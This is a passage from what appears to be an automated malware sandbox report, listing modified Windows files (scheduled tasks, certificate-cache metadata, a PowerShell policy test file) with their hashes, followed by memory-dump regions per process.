                                                                                                                      129d0b993cd3858af5b7e87fdf74d8e59e6f2110184b5c905df8f5f6f2c39d8b

                                                                                                                      SHA512

                                                                                                                      b87a829c86eff1d10e1590b18a9909f05101a535e5f4cef914a4192956eb35a8bfef614c9f95d53783d77571687f3eb3c4e8ee2f24d23ad24e0976d8266b8890

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      ceb7caa4e9c4b8d760dbf7e9e5ca44c5

                                                                                                                      SHA1

                                                                                                                      a3879621f9493414d497ea6d70fbf17e283d5c08

                                                                                                                      SHA256

                                                                                                                      98c054088df4957e8d6361fd2539c219bcf35f8a524aad8f5d1a95f218e990e9

                                                                                                                      SHA512

                                                                                                                      1eddfbf4cb62d3c5b4755a371316304aaeabb00f01bad03fb4f925a98a2f0824f613537d86deddd648a74d694dc13ed5183e761fdc1ec92589f6fa28beb7fbff

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      7d612892b20e70250dbd00d0cdd4f09b

                                                                                                                      SHA1

                                                                                                                      63251cfa4e5d6cbf6fb14f6d8a7407dbe763d3f5

                                                                                                                      SHA256

                                                                                                                      727c9e7b91e144e453d5b32e18f12508ee84dabe71bc852941d9c9b4923f9e02

                                                                                                                      SHA512

                                                                                                                      f8d481f3300947d49ce5ab988a9d4e3154746afccc97081cbed1135ffb24fc107203d485dda2d5d714e74e752c614d8cfd16781ea93450fe782ffae3f77066d1

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      1e8e2076314d54dd72e7ee09ff8a52ab

                                                                                                                      SHA1

                                                                                                                      5fd0a67671430f66237f483eef39ff599b892272

                                                                                                                      SHA256

                                                                                                                      55f203d6b40a39a6beba9dd3a2cb9034284f49578009835dd4f0f8e1db6ebe2f

                                                                                                                      SHA512

                                                                                                                      5b0c97284923c4619d9c00cba20ce1c6d65d1826abe664c390b04283f7a663256b4a6efe51f794cb5ec82ccea80307729addde841469da8d041cbcfd94feb0f6

                                                                                                                    • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work
                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      0b990e24f1e839462c0ac35fef1d119e

                                                                                                                      SHA1

                                                                                                                      9e17905f8f68f9ce0a2024d57b537aa8b39c6708

                                                                                                                      SHA256

                                                                                                                      a1106ed0845cd438e074344e0fe296dc10ee121a0179e09398eaaea2357c614a

                                                                                                                      SHA512

                                                                                                                      c65ba42fc0a2cb0b70888beb8ca334f7d5a8eaf954a5ef7adaecbcb4ce8d61b34858dfd9560954f95f59b4d8110a79ceaa39088b6a0caf8b42ceda41b46ec4a4

                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                      Filesize

                                                                                                                      330B

                                                                                                                      MD5

                                                                                                                      d68c3f9d39129d84db385ccaa1d5c083

                                                                                                                      SHA1

                                                                                                                      36813376cd5e76363333cd49a4e818c96f043ad6

                                                                                                                      SHA256

                                                                                                                      574d1f7f9b9636f3237390a81f831870c4c336a3cb3129141fe4039883ba83e2

                                                                                                                      SHA512

                                                                                                                      14fb165df4747c94d6f1b89591b75cbd6b6e4e9c9eaa42d7d7f9537c7a3b47d6de9e57eed4d75713fc5df94915cfd449afad164d905b03c25c8951bb3d5b2930

                                                                                                                    • C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749
                                                                                                                      Filesize

                                                                                                                      290B

                                                                                                                      MD5

                                                                                                                      72890d5b5fcd9b7cf9525622fbc73cdc

                                                                                                                      SHA1

                                                                                                                      05f6663f4b6c765f81579b7524b656dfe27c9723

                                                                                                                      SHA256

                                                                                                                      c5cd9e40a0e1c2b33f5c5d2a4ee6a8d4efe412cc2f275cec26031bd2be8b2d93

                                                                                                                      SHA512

                                                                                                                      ee0b3c53949589b4be90caec576b31fd65a98225e06279beb9c02f8387b36962db9425b90344d6bec686d34fdc29c723f15a4a3a3092f22b43eddcd82c65688c

                                                                                                                    • C:\Windows\Temp\__PSScriptPolicyTest_naqhkywz.o0e.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04
                                                                                                                      Filesize

                                                                                                                      412B

                                                                                                                      MD5

                                                                                                                      0e05cdc171abc40eb42b921e7bb7894e

                                                                                                                      SHA1

                                                                                                                      c713d2cd224b5b14afd24b3dace9cad8d32af0bb

                                                                                                                      SHA256

                                                                                                                      267a13c3b7a5cd40757d1202ef1ae7be2b84e34f210b3f9a0fd1e95600acb306

                                                                                                                      SHA512

                                                                                                                      7bb0e563b019a6b6fa4ca2b12bbf82aaa46b38e8652582e3a276e4af80f8b28196a508e9efa76cb348a7dc3bb8f33c1eb395ba2ec19e94e7ded8c18ce4525313

                                                                                                                    • memory/64-82-0x000001E9491C0000-0x000001E9491EB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/64-88-0x000001E9491C0000-0x000001E9491EB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/64-89-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/408-93-0x000001A99A710000-0x000001A99A73B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/616-45-0x0000019AA3E10000-0x0000019AA3E35000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      148KB

                                                                                                                    • memory/616-46-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/616-47-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/616-53-0x0000019AA3E40000-0x0000019AA3E6B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/616-54-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/676-65-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/676-64-0x00000143A40D0000-0x00000143A40FB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/676-58-0x00000143A40D0000-0x00000143A40FB000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/956-78-0x00007FFD8CD10000-0x00007FFD8CD20000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/956-71-0x000001CF86450000-0x000001CF8647B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/956-77-0x000001CF86450000-0x000001CF8647B000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      172KB

                                                                                                                    • memory/1524-21-0x000001D21F910000-0x000001D21F932000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/1524-31-0x000001D21FC80000-0x000001D21FCAA000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      168KB

                                                                                                                    • memory/1524-32-0x00007FFDCCC90000-0x00007FFDCCE85000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/1524-33-0x00007FFDCC8E0000-0x00007FFDCC99E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                    • memory/3244-7-0x00000000069E0000-0x0000000006A1C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      240KB

                                                                                                                    • memory/3244-20-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/3244-1-0x0000000000D10000-0x0000000000D7C000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      432KB

                                                                                                                    • memory/3244-2-0x0000000005C90000-0x0000000006234000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      5.6MB

                                                                                                                    • memory/3244-3-0x00000000057C0000-0x0000000005852000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      584KB

                                                                                                                    • memory/3244-0-0x0000000074A7E000-0x0000000074A7F000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                    • memory/3244-4-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/3244-5-0x0000000005860000-0x00000000058C6000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      408KB

                                                                                                                    • memory/3244-6-0x00000000064A0000-0x00000000064B2000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      72KB

                                                                                                                    • memory/3544-858-0x0000000006DB0000-0x0000000006DBA000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      40KB

                                                                                                                    • memory/3544-14-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/3544-13-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/3544-857-0x0000000074A70000-0x0000000075220000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                    • memory/3584-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-42-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-37-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-39-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      32KB

                                                                                                                    • memory/3584-40-0x00007FFDCCC90000-0x00007FFDCCE85000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                    • memory/3584-41-0x00007FFDCC8E0000-0x00007FFDCC99E000-memory.dmp
                                                                                                                      Filesize

                                                                                                                      760KB